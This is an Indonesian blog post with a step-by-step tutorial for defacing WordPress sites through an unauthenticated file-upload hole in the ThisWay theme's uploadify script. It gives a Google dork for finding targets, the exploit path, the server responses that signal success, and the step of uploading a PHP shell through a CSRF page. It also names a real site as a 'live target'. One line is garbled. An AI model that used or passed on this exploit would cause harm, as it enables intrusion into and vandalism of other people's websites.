Assalamu'alaikum
Oke Gan Selamat Datang Kembali di Blog Saya hehehe Udh lama Nih Mimin Gak UPDATE tentang Tutorial Khusus nya Dalam DEFACE .. ^_^ Lanjut saja Simak Tutorial di bawah ya
1.DORK
2.Exploit
3.CSRFcvvghhhh lang
>y
Eksekusi Selanjutnya
1.Pertama masukan dork ini di kolom mesin pencarian google/search engine
- inurl:/wp-content/themes/ThisWay/ site:com <= Bisa di kembangin Lagi Biar dapet yg FRESS Gan
Live Target : http://www.beautyandhair.com.mx
2.Lalu masukan exploit ini : "/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"
- example :
http://target.com/[patch]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
3.Apabila keluar tulisan seperti ini {"status":"NOK","ERR":"This file is incorect"} atau Blank kemungkinan besar website tersebut Vuln. namun apabila keluar Error 404 dan sebagainya berarti tidak vuln Gan :v
4.Lalu pastekan script berikut di notepad, lalu save dengan ekstensi .html
Script CSRF
5.Nanti keluar result/tulisan seperti ini : {"status":"OK","imageID":12,"imageName":"settingimage_namarandomnameshell.php"}
Bila tidak nongol tulisan kaya gitu, cari target lain :)
Nih mimin Kasih Live Target Gan .. Jangan di rusak Yak Live Target Nya :D
Sekian Tutorial kali ini Gan Semoga bermanfaat ^_^... Bagi Yg Mau CopAS Mohon Di Kasih SUmber nya Gan Trimakasih ;)
Komentar
Posting Komentar